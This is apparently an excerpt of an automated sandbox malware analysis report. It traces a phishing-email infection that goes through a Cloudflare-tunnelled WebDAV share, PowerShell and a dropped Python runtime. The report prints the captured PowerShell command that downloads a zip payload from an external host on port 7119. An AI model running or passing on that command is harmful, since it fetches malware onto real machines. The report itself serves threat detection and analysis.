                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{41945702-8302-44A6-9445-AC98E8AFA086}\InprocServer32
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

                Data Obfuscation

                barindex
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"

                Persistence and Installation Behavior

                barindex
                AI detected suspicious e-Mail
                Source: e-MailLLM: Score: 8 Reasons: The email contains several indicators of a phishing attempt. Firstly, it uses a generic greeting and lacks personalization, which is common in phishing emails. Secondly, the email creates a sense of urgency by mentioning an attached invoice, which could prompt the recipient to open the attachment without verifying its authenticity. Thirdly, the email is written in German, which might not be the recipient's primary language, adding to the confusion. Lastly, there is no clear indication of the sender's identity or contact information, which is suspicious. The combination of these factors suggests a high risk of phishing.
                Chrome launches external ms-search protocol handler (WebDAV)
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\string-neural-inspiration-polo.trycloudflare.com@SSL\DavWWWRoot
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\string-neural-inspiration-polo.trycloudflare.com@SSL\DavWWWRoot
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyw.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\py.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\select.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pydJump to dropped file
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 62240 -> 7119
                Source: unknownNetwork traffic detected: HTTP traffic on port 7119 -> 62240
                Source: unknownNetwork traffic detected: HTTP traffic on port 62259 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62259
                Source: unknownNetwork traffic detected: HTTP traffic on port 62259 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62260 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62259
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62260
                Source: unknownNetwork traffic detected: HTTP traffic on port 62262 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62263 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62264 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62262
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62263
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62264
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62266
                Source: unknownNetwork traffic detected: HTTP traffic on port 62266 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62268 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62268
                Source: unknownNetwork traffic detected: HTTP traffic on port 62276 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62276
                Source: unknownNetwork traffic detected: HTTP traffic on port 62276 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62276
                Source: unknownNetwork traffic detected: HTTP traffic on port 62280 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62280
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62281
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62282
                Source: unknownNetwork traffic detected: HTTP traffic on port 62282 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62282
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
